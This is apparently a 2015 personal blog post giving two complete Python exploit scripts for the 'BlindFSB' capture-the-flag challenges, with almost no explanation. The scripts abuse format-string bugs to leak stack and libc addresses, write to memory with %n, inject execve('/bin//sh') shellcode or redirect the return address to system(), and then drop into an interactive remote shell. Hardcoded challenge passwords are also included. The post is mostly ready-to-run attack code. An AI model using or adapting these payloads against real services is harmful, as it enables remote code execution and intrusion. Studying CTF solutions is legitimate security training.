JFF3 BlindFSB

Games/CTF 2015. 7. 31. 13:11

BFSB1.


from socket import *

import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib


# common stuffs

p  = lambda x: struct.pack("<L", x)

pq = lambda x: struct.pack("<Q", x)

ph = lambda x: struct.pack("<H", x)

pb = lambda x: struct.pack("<B", x)


def recv_until(s, pat):

msg = ''

while True:

msg += s.recv(1024)

if msg.find(pat) != -1:

break

return msg


def check(s):

for c in s:

if c not in '1234567890abcdef \n': return False

return True


# pwn

s = socket(AF_INET, SOCK_STREAM)

s.connect( ('leaveret.kr',  10112) )


'''

# stage1

print 'go!'

recv_until(s, 'password or quit? ')

print 'stage1 start!'

for i in xrange(800, 980):

payload = '%{0}$llx'.format(i)

s.send(payload + '\n')

result = s.recv(1024).split('\n')[0]

print '{0} -> {1}'.format(payload, result)

if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]

#payload = '%{0}$s'.format(i)

#s.send(payload + '\n')

#print '{0} -> {1}'.format(payload, s.recv(1024))

'''

recv_until(s, 'password or quit? ')

s.send('LeaveRet_Handsome_Sexy_Pretty_Smart_ZZZZ\n')


# stage2

shellcode = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"

nop = "\x90"

recv_until(s, 'break? ')

print 'stage2 start!'


# put shellcode

s.send(nop*90 + shellcode + '\n')

recv_until(s, 'break? ')


# get stack address

s.send('%196$llx\n')

stack_addr = int(recv_until(s, 'break? ').split('\n')[0], 16)

print 'stack address -{0}-'.format(hex(stack_addr))


# stack offset

RET_OFFSET = 416

SH_OFFSET = 1424

sh_addr = stack_addr - SH_OFFSET

print 'shellcode at -{0}-'.format(hex(sh_addr))


# overwrite 8 byte ret address byte-to-byte

for N in xrange(6):

byte = str(int( ((sh_addr >> (N*8)) & 0xFF) ))

print 'overwrite!' + byte

# write ret address to stack

s.send( 'A'*56 + pq(stack_addr - RET_OFFSET + N) + '\n' )

recv_until(s, 'break? ').split('\n')[0]

# write a value to return address

s.send( '%'+byte+'c%17$n\n' )

recv_until(s, 'break? ').split('\n')[0]


# inspect stack

print 'check STACK!'

'''

for i in xrange(1, 30):

        payload = '%{0}$llx'.format(i)

        s.send(payload + '\n')

        result = recv_until(s, 'break? ').split('\npayload')[0]

        print '{0} -> {1}'.format(payload, result)

        #if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]

'''


# return to shellcode

s.send('break\n')


# get shell

t = telnetlib.Telnet()

t.sock = s

t.interact()










BFSB2.

from socket import *

import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib


# common stuffs

p  = lambda x: struct.pack("<L", x)

pq = lambda x: struct.pack("<Q", x)

ph = lambda x: struct.pack("<H", x)

pb = lambda x: struct.pack("<B", x)


def recv_until(s, pat):

msg = ''

while True:

msg += s.recv(1024)

if msg.find(pat) != -1:

break

return msg


def check(s):

for c in s:

if c not in '1234567890abcdef \n': return False

return True


# pwn

s = socket(AF_INET, SOCK_STREAM)

s.connect( ('leaveret.kr',  10094) )




# stage1

def dump_memory(p_addr):

        addr = p_addr

        elf = ''

        while True:

                if pq(addr).find('\n') != -1:

                        addr += 1

                        continue

                payload = '%21$sBBB' + pq(addr)

                s.send(payload + '\n')

                result = recv_until(s, 'break? ').split('BBB')[0]

                if len(result) < 1:

                        elf += '\x00'

                        addr += 1

                else:

                        elf += result

                        addr += len(result)

                print '{0} : {1}'.format(hex(addr), result.encode('hex'))

                print elf.encode('hex')


#dump_memory( 0x8048000 ) # dump ELF image to find password.


recv_until(s, 'password or quit? ')

s.send('Have_A_Fun_QUESTIONMARK_Love_FSB_NOT_GirlFrienddd\n')

print recv_until(s, 'break? ')


# stage2

def mem_read(addr):

if pq(addr).find('\n') != -1:

print 'address contains 0a!'

return 0

payload = '%21$sBBB' + pq(addr)

s.send(payload + '\n')

result = int(recv_until(s, 'break? ').split('BBB')[0][:4][::-1].encode('hex'), 16)

        print 'mem_read> {0} : {1}'.format(hex(addr), hex(result))

return result


def mem_write(addr, data):

        if pq(addr).find('\n') != -1:

                print 'address contains 0a!'

                return 0

e1 = (data) & 0xFF

e2 = (data>>8) & 0xFF

e3 = (data>>16) & 0xFF

e4 = (data>>24) & 0xFF


if e1 < 10: e1 = e1-5

elif e1 < 100: e1 = e1-4

else: e1 = e1 - 3


        if e2 < 10: e2 = e2-5

        elif e2 < 100: e2 = e2-4

        else: e2 = e2 - 3


        if e3 < 10: e3 = e3-5

        elif e3 < 100: e3 = e3-4

        else: e3 = e3 - 3


        if e4 < 10: e4 = e4-5

        elif e4 < 100: e4 = e4-4

        else: e4 = e4 - 3


print 'writing...'

pad8 = '%{0}c'.format(e1)

pad8 = pad8 + '#'*(8-len(pad8))

        payload = pad8 + '%23$nBBB' + pq(addr)

        s.send(payload + '\n')

        recv_until(s, 'break? ').split('BBB')[0].split('###')[1]


        pad8 = '%{0}c'.format(e2)

        pad8 = pad8 + '#'*(8-len(pad8))

        payload = pad8 + '%23$nBBB' + pq(addr+1)

        s.send(payload + '\n')

        recv_until(s, 'break? ').split('BBB')[0].split('###')[1]


        pad8 = '%{0}c'.format(e3)

        pad8 = pad8 + '#'*(8-len(pad8))

        payload = pad8 + '%23$nBBB' + pq(addr+2)

        s.send(payload + '\n')

        recv_until(s, 'break? ').split('BBB')[0].split('###')[1]


        pad8 = '%{0}c'.format(e4)

        pad8 = pad8 + '#'*(8-len(pad8))

        payload = pad8 + '%23$nBBB' + pq(addr+3)

        s.send(payload + '\n')

        recv_until(s, 'break? ').split('BBB')[0].split('###')[1]

        print 'mem_write> {0} : {1}'.format(hex(addr), hex(data))


def mem_leak():

RET_OFFSET = 0x68 # parent stack frame size

payload = '%278$xBBB'

s.send(payload + '\n')

result = int(recv_until(s, 'break? ').split('BBB')[0][:8], 16)

return (result - RET_OFFSET - 4)

# leak got

# libc_start offset :18650

# system offset : 3b160

system = mem_read(0x804b04c) + 0x22B10 #libc_start + 0x22b10 -> system

p_retaddr = mem_leak()

print 'ret addr at {0}'.format(hex(p_retaddr))

print 'system at {0}'.format(hex(system))


# overwrite ret address!

mem_write(p_retaddr, system)


# build rop chain

stack = p_retaddr

mem_write(stack+8, stack+16)

mem_write(stack+16, 0x6e69622f)

mem_write(stack+20, 0x68732f2f)

mem_write(stack+24, 0)


# inspect stack

'''

print 'check STACK!'

for i in xrange(270, 295):

        payload = '%{0}$xBBB'.format(i)

        s.send(payload + '\n')

        result = recv_until(s, 'break? ').split('BBB')[0]

        print '{0} -> {1}'.format(payload, result)

        if len(result) % 2 == 0 and check(result) == True : print result.decode('hex')[::-1]

'''


s.send('break\n')


# get shell

t = telnetlib.Telnet()

t.sock = s

t.interact()

'Games > CTF' 카테고리의 다른 글

MMA CTF 2015 SPELL  (0) 2015.09.08
MMA CTF 2015 RPS  (0) 2015.09.08
JFF3 BlindFSB  (0) 2015.07.31
GITS 2014 TI-1337  (0) 2014.12.22
SECCON 2014 Advanced RISC Machine  (0) 2014.12.08
hack.lu callgate writeup  (0) 2014.10.28
Posted by daehee87

댓글을 달아 주세요